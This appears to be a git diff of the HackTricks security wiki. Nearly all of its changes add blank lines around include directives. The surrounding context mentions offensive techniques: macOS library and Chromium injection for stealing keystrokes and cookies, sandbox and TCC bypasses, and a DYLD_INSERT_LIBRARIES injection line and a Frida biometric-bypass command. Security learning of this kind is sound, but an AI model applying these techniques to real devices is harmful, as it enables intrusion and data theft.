{{#endref}}
|
||||
@ -14,6 +15,7 @@ macos-security-protections/macos-tcc/
|
||||
|
||||
Please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../linux-hardening/privilege-escalation/
|
||||
{{#endref}}
|
||||
@ -240,6 +242,7 @@ A more detailed explanation can be [**found in the original report**](https://th
|
||||
|
||||
This can be useful to escalate privileges:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-files-folders-and-binaries/macos-sensitive-locations.md
|
||||
{{#endref}}
|
||||
@ -247,4 +250,3 @@ macos-files-folders-and-binaries/macos-sensitive-locations.md
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -151,6 +151,7 @@ MacOS, like any other operating system, provides a variety of methods and mechan
|
||||
|
||||
Library Injection is a technique wherein an attacker **forces a process to load a malicious library**. Once injected, the library runs in the context of the target process, providing the attacker with the same permissions and access as the process.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-library-injection/
|
||||
{{#endref}}
|
||||
@ -159,6 +160,7 @@ macos-library-injection/
|
||||
|
||||
Function Hooking involves **intercepting function calls** or messages within a software code. By hooking functions, an attacker can **modify the behavior** of a process, observe sensitive data, or even gain control over the execution flow.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-function-hooking.md
|
||||
{{#endref}}
|
||||
@ -167,6 +169,7 @@ macos-function-hooking.md
|
||||
|
||||
Inter Process Communication (IPC) refers to different methods by which separate processes **share and exchange data**. While IPC is fundamental for many legitimate applications, it can also be misused to subvert process isolation, leak sensitive information, or perform unauthorized actions.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-ipc-inter-process-communication/
|
||||
{{#endref}}
|
||||
@ -175,6 +178,7 @@ macos-ipc-inter-process-communication/
|
||||
|
||||
Electron applications executed with specific env variables could be vulnerable to process injection:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-electron-applications-injection.md
|
||||
{{#endref}}
|
||||
@ -183,6 +187,7 @@ macos-electron-applications-injection.md
|
||||
|
||||
It's possible to use the flags `--load-extension` and `--use-fake-ui-for-media-stream` to perform a **man in the browser attack** allowing to steal keystrokes, traffic, cookies, inject scripts in pages...:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-chromium-injection.md
|
||||
{{#endref}}
|
||||
@ -191,6 +196,7 @@ macos-chromium-injection.md
|
||||
|
||||
NIB files **define user interface (UI) elements** and their interactions within an application. However, they can **execute arbitrary commands** and **Gatekeeper doesn't stop** an already executed application from being executed if a **NIB file is modified**. Therefore, they could be used to make arbitrary programs execute arbitrary commands:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-dirty-nib.md
|
||||
{{#endref}}
|
||||
@ -199,6 +205,7 @@ macos-dirty-nib.md
|
||||
|
||||
It's possible to abuse certain java capabilities (like the **`_JAVA_OPTS`** env variable) to make a java application execute **arbitrary code/commands**.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-java-apps-injection.md
|
||||
{{#endref}}
|
||||
@ -207,6 +214,7 @@ macos-java-apps-injection.md
|
||||
|
||||
It's possible to inject code into .Net applications by **abusing the .Net debugging functionality** (not protected by macOS protections such as runtime hardening).
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-.net-applications-injection.md
|
||||
{{#endref}}
|
||||
@ -215,6 +223,7 @@ macos-.net-applications-injection.md
|
||||
|
||||
Check different options to make a Perl script execute arbitrary code in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-perl-applications-injection.md
|
||||
{{#endref}}
|
||||
@ -223,6 +232,7 @@ macos-perl-applications-injection.md
|
||||
|
||||
I't also possible to abuse ruby env variables to make arbitrary scripts execute arbitrary code:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-ruby-applications-injection.md
|
||||
{{#endref}}
|
||||
@ -276,4 +286,3 @@ Note that to call that function you need to be **the same uid** as the one runni
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
@ -534,6 +534,7 @@ Any thread can get this port calling to **`mach_thread_sef`**.
|
||||
|
||||
You can grab a shellcode from:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
|
||||
{{#endref}}
|
||||
@ -814,6 +815,7 @@ Therefore, to **improve the thread** it should call **`pthread_create_from_mach_
|
||||
|
||||
You can find **example dylibs** in (for example the one that generates a log and then you can listen to it):
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
|
||||
{{#endref}}
|
||||
@ -1104,6 +1106,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector
|
||||
|
||||
In this technique a thread of the process is hijacked:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-thread-injection-via-task-port.md
|
||||
{{#endref}}
|
||||
@ -1258,6 +1261,7 @@ XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication
|
||||
|
||||
For more information about how this **communication work** on how it **could be vulnerable** check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-xpc/
|
||||
{{#endref}}
|
||||
@ -1270,6 +1274,7 @@ MIC basically **generates the needed code** for server and client to communicate
|
||||
|
||||
For more info check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-mig-mach-interface-generator.md
|
||||
{{#endref}}
|
||||
@ -1287,4 +1292,3 @@ macos-mig-mach-interface-generator.md
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -126,6 +126,7 @@ Applications can **subscribe** to different event **messages**, enabling them to
|
||||
|
||||
When a process tries to call a method from via an XPC connection, the **XPC service should check if that process is allowed to connect**. Here are the common ways to check that and the common pitfalls:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-xpc-connecting-process-check/
|
||||
{{#endref}}
|
||||
@ -134,6 +135,7 @@ macos-xpc-connecting-process-check/
|
||||
|
||||
Apple also allows apps to **configure some rights and how to get them** so if the calling process have them it would be **allowed to call a method** from the XPC service:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-xpc-authorization.md
|
||||
{{#endref}}
|
||||
@ -486,4 +488,3 @@ It's possible to find thee communications using `netstat`, `nettop` or the open
|
||||
{{#include ../../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -31,6 +31,7 @@ An example could be found in [EvenBetterAuthorizationSample](https://github.com/
|
||||
|
||||
For more information about how to properly configure this check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-xpc-connecting-process-check/
|
||||
{{#endref}}
|
||||
@ -442,4 +443,3 @@ int main(void) {
|
||||
{{#include ../../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -26,12 +26,14 @@ When a connection is stablished to an XPC service, the server will check if the
|
||||
|
||||
For more information about the PID reuse attack check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-pid-reuse.md
|
||||
{{#endref}}
|
||||
|
||||
For more information **`xpc_connection_get_audit_token`** attack check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-xpc_connection_get_audit_token-attack.md
|
||||
{{#endref}}
|
||||
@ -95,4 +97,3 @@ if ((csFlags & (cs_hard | cs_require_lv)) {
|
||||
{{#include ../../../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -8,6 +8,7 @@
|
||||
|
||||
If you don't know what Mach Messages are start checking this page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../
|
||||
{{#endref}}
|
||||
@ -19,6 +20,7 @@ Mach messages are sent over a _mach port_, which is a **single receiver, multipl
|
||||
|
||||
If you don't know how a XPC connection is established check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../
|
||||
{{#endref}}
|
||||
@ -125,4 +127,3 @@ Below is a visual representation of the described attack scenario:
|
||||
{{#include ../../../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -9,6 +9,7 @@
|
||||
|
||||
Take a look on how Dyld loads libraries inside binaries in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-dyld-process.md
|
||||
{{#endref}}
|
||||
@ -50,6 +51,7 @@ You can also load a library if it's **signed with the same certificate as the bi
|
||||
|
||||
Find a example on how to (ab)use this and check the restrictions in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-dyld-hijacking-and-dyld_insert_libraries.md
|
||||
{{#endref}}
|
||||
@ -108,6 +110,7 @@ The way to **escalate privileges** abusing this functionality would be in the ra
|
||||
|
||||
**Example**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-dyld-hijacking-and-dyld_insert_libraries.md
|
||||
{{#endref}}
|
||||
@ -339,4 +342,3 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -19,6 +19,7 @@ Dyld will be loaded by **`dyldboostrap::start`**, which will also load things su
|
||||
|
||||
**`dyls::_main()`** is the entry point of dyld and it's first task is to run `configureProcessRestrictions()`, which usually restricts **`DYLD_*`** environment variables explained in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
./
|
||||
{{#endref}}
|
||||
@ -316,4 +317,3 @@ find . -type f | xargs grep strcmp| grep key,\ \" | cut -d'"' -f2 | sort -u
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -8,6 +8,7 @@ Gatekeeper is usually used to refer to the combination of **Quarantine + Gatekee
|
||||
|
||||
More information in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-gatekeeper.md
|
||||
{{#endref}}
|
||||
@ -18,6 +19,7 @@ macos-gatekeeper.md
|
||||
|
||||
### SIP - System Integrity Protection
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-sip.md
|
||||
{{#endref}}
|
||||
@ -26,6 +28,7 @@ macos-sip.md
|
||||
|
||||
MacOS Sandbox **limits applications** running inside the sandbox to the **allowed actions specified in the Sandbox profile** the app is running with. This helps to ensure that **the application will be accessing only expected resources**.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-sandbox/
|
||||
{{#endref}}
|
||||
@ -34,6 +37,7 @@ macos-sandbox/
|
||||
|
||||
**TCC (Transparency, Consent, and Control)** is a security framework. It's designed to **manage the permissions** of applications, specifically by regulating their access to sensitive features. This includes elements like **location services, contacts, photos, microphone, camera, accessibility, and full disk access**. TCC ensures that apps can only access these features after obtaining explicit user consent, thereby bolstering privacy and control over personal data.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-tcc/
|
||||
{{#endref}}
|
||||
@ -42,6 +46,7 @@ macos-tcc/
|
||||
|
||||
Launch constraints in macOS are a security feature to **regulate process initiation** by defining **who can launch** a process, **how**, and **from where**. Introduced in macOS Ventura, they categorize system binaries into constraint categories within a **trust cache**. Every executable binary has set **rules** for its **launch**, including **self**, **parent**, and **responsible** constraints. Extended to third-party apps as **Environment** Constraints in macOS Sonoma, these features help mitigate potential system exploitations by governing process launching conditions.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-launch-environment-constraints.md
|
||||
{{#endref}}
|
||||
@ -145,4 +150,3 @@ References and **more information about BTM**:
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -160,6 +160,7 @@ ls -le test
|
||||
|
||||
Not really needed but I leave it there just in case:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-xattr-acls-extra-stuff.md
|
||||
{{#endref}}
|
||||
@ -469,4 +470,3 @@ This feature is particularly useful for preventing certain classes of security v
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -287,6 +287,7 @@ On macOS, unlike iOS where processes are sandboxed from the start by the kernel,
|
||||
|
||||
Processes are automatically Sandboxed from userland when they start if they have the entitlement: `com.apple.security.app-sandbox`. For a detailed explanation of this process check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-sandbox-debug-and-bypass/
|
||||
{{#endref}}
|
||||
@ -401,4 +402,3 @@ Sandbox also has a user daemon running exposing the XPC Mach service `com.apple.
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -30,6 +30,7 @@ This is what was done in [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023
|
||||
|
||||
In the [**last examples of Word sandbox bypass**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv) can be appreciated how the **`open`** cli functionality could be abused to bypass the sandbox.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-office-sandbox-bypasses.md
|
||||
{{#endref}}
|
||||
@ -47,6 +48,7 @@ For this you might even need **2 steps**: To make a process with a **more permis
|
||||
|
||||
Check this page about **Auto Start locations**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../../../macos-auto-start-locations.md
|
||||
{{#endref}}
|
||||
@ -55,6 +57,7 @@ Check this page about **Auto Start locations**:
|
||||
|
||||
If from then sandbox process you are able to **compromise other processes** running in less restrictive sandboxes (or none), you will be able to escape to their sandboxes:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../../macos-proces-abuse/
|
||||
{{#endref}}
|
||||
@ -270,6 +273,7 @@ Note that even if some **actions** might be **allowed by at he sandbox** if an a
|
||||
|
||||
For more information about **Interposting** check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../../macos-proces-abuse/macos-function-hooking.md
|
||||
{{#endref}}
|
||||
@ -501,4 +505,3 @@ Process 2517 exited with status = 0 (0x00000000)
|
||||
{{#include ../../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -330,6 +330,7 @@ INSERT INTO access (
|
||||
|
||||
If you managed to get inside an app with some TCC permissions check the following page with TCC payloads to abuse them:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-tcc-payloads.md
|
||||
{{#endref}}
|
||||
@ -338,6 +339,7 @@ macos-tcc-payloads.md
|
||||
|
||||
Learn about Apple Events in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-apple-events.md
|
||||
{{#endref}}
|
||||
@ -590,6 +592,7 @@ AllowApplicationsList.plist:
|
||||
|
||||
### TCC Bypasses
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-tcc-bypasses/
|
||||
{{#endref}}
|
||||
@ -604,4 +607,3 @@ macos-tcc-bypasses/
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -35,6 +35,7 @@ Moreover, it's possible to **remove the legit app from the Dock and put the fake
|
||||
|
||||
More info and PoC in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../../macos-privilege-escalation.md
|
||||
{{#endref}}
|
||||
@ -72,6 +73,7 @@ An app with the **`kTCCServiceAppleEvents`** permission will be able to **contro
|
||||
|
||||
For more info about Apple Scripts check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
macos-apple-scripts.md
|
||||
{{#endref}}
|
||||
@ -262,6 +264,7 @@ For more info check the [**original report**](https://www.microsoft.com/en-us/se
|
||||
|
||||
There are different techniques to inject code inside a process and abuse its TCC privileges:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../../macos-proces-abuse/
|
||||
{{#endref}}
|
||||
@ -508,6 +511,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was
|
||||
|
||||
## By startup apps
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../../../macos-auto-start-locations.md
|
||||
{{#endref}}
|
||||
@ -537,4 +541,3 @@ Another way using [**CoreGraphics events**](https://objectivebythesea.org/v2/tal
|
||||
|
||||
{{#include ../../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
android-applications-basics.md
|
||||
{{#endref}}
|
||||
@ -54,10 +55,12 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
|
||||
|
||||
## Case Studies & Vulnerabilities
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../ios-pentesting/air-keyboard-remote-input-injection.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
|
||||
{{#endref}}
|
||||
@ -98,6 +101,7 @@ In effect, it is **blinding the user from knowing they are actually performing a
|
||||
|
||||
Find more information in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
tapjacking.md
|
||||
{{#endref}}
|
||||
@ -108,6 +112,7 @@ An **activity** with the **`launchMode`** set to **`singleTask` without any `tas
|
||||
|
||||
More info in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
android-task-hijacking.md
|
||||
{{#endref}}
|
||||
@ -182,6 +187,7 @@ Developers shouldn't use **deprecated algorithms** to perform authorisation **ch
|
||||
|
||||
Read the following page to learn how to easily access javascript code of React applications:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
react-native-application.md
|
||||
{{#endref}}
|
||||
@ -190,6 +196,7 @@ react-native-application.md
|
||||
|
||||
Read the following page to learn how to easily access C# code of a xamarin applications:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../xamarin-apps.md
|
||||
{{#endref}}
|
||||
@ -210,6 +217,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
|
||||
|
||||
### Bypass Biometric Authentication
|
||||
|
||||
|
||||
{{#ref}}
|
||||
bypass-biometric-authentication-android.md
|
||||
{{#endref}}
|
||||
@ -223,6 +231,7 @@ bypass-biometric-authentication-android.md
|
||||
|
||||
### **Other tricks**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
content-protocol.md
|
||||
{{#endref}}
|
||||
@ -252,6 +261,7 @@ Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emu
|
||||
- [**Android Studio**](https://developer.android.com/studio) (You can create **x86** and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator).
|
||||
- Learn to set it up in this page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
avd-android-virtual-device.md
|
||||
{{#endref}}
|
||||
@ -792,4 +802,3 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -223,6 +223,7 @@ Using [rootAVD](https://github.com/newbit1/rootAVD) with [Magisk](https://github
|
||||
|
||||
Check the following page to learn how to install a custom CA cert:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
install-burp-certificate.md
|
||||
{{#endref}}
|
||||
@ -238,4 +239,3 @@ You can **use the GUI** to take a snapshot of the VM at any time:
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -107,6 +107,7 @@ wm.addView(phishingView, lp);
|
||||
|
||||
For additional details on leveraging Accessibility Services for full remote device control (e.g. PlayPraetor, SpyNote, etc.) see:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
accessibility-services-abuse.md
|
||||
{{#endref}}
|
||||
@ -114,4 +115,4 @@ accessibility-services-abuse.md
|
||||
## References
|
||||
* [Bitsight – ToxicPanda Android Banking Malware 2025 Study](https://www.bitsight.com/blog/toxicpanda-android-banking-malware-2025-study)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
@ -4,6 +4,7 @@
|
||||
|
||||
## iOS Basics
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-basics.md
|
||||
{{#endref}}
|
||||
@ -12,6 +13,7 @@ ios-basics.md
|
||||
|
||||
In this page you can find information about the **iOS simulator**, **emulators** and **jailbreaking:**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-testing-environment.md
|
||||
{{#endref}}
|
||||
@ -22,6 +24,7 @@ ios-testing-environment.md
|
||||
|
||||
During the testing **several operations are going to be suggested** (connect to the device, read/write/upload/download files, use some tools...). Therefore, if you don't know how to perform any of these actions please, **start reading the page**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
basic-ios-testing-operations.md
|
||||
{{#endref}}
|
||||
@ -158,6 +161,7 @@ $ frida-ps -Uai
|
||||
|
||||
Learn how to **enumerate the components of the application** and how to easily **hook methods and classes** with objection:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-hooking-with-objection.md
|
||||
{{#endref}}
|
||||
@ -387,6 +391,7 @@ However, the best options to disassemble the binary are: [**Hopper**](https://ww
|
||||
|
||||
To learn about how iOS stores data in the device read this page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-basics.md
|
||||
{{#endref}}
|
||||
@ -486,6 +491,7 @@ Developers are enabled to **store and sync data** within a **NoSQL cloud-hosted
|
||||
|
||||
You can find how to check for misconfigured Firebase databases here:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../network-services-pentesting/pentesting-web/buckets/firebase-database.md
|
||||
{{#endref}}
|
||||
@ -1056,42 +1062,49 @@ frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-i
|
||||
|
||||
### Custom URI Handlers / Deeplinks / Custom Schemes
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-custom-uri-handlers-deeplinks-custom-schemes.md
|
||||
{{#endref}}
|
||||
|
||||
### Universal Links
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-universal-links.md
|
||||
{{#endref}}
|
||||
|
||||
### UIActivity Sharing
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-uiactivity-sharing.md
|
||||
{{#endref}}
|
||||
|
||||
### UIPasteboard
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-uipasteboard.md
|
||||
{{#endref}}
|
||||
|
||||
### App Extensions
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-app-extensions.md
|
||||
{{#endref}}
|
||||
|
||||
### WebViews
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-webviews.md
|
||||
{{#endref}}
|
||||
|
||||
### Serialisation and Encoding
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ios-serialisation-and-encoding.md
|
||||
{{#endref}}
|
||||
@ -1101,6 +1114,7 @@ ios-serialisation-and-encoding.md
|
||||
It's important to check that no communication is occurring **without encryption** and also that the application is correctly **validating the TLS certificate** of the server.\
|
||||
To check these kind of issues you can use a proxy like **Burp**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
burp-configuration-for-ios.md
|
||||
{{#endref}}
|
||||
@ -1150,6 +1164,7 @@ otool -L <application_path>
|
||||
|
||||
## Interesting Vulnerabilities & Case Studies
|
||||
|
||||
|
||||
{{#ref}}
|
||||
air-keyboard-remote-input-injection.md
|
||||
{{#endref}}
|
||||
@ -1185,4 +1200,3 @@ air-keyboard-remote-input-injection.md
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
x
Reference in New Issue
Block a user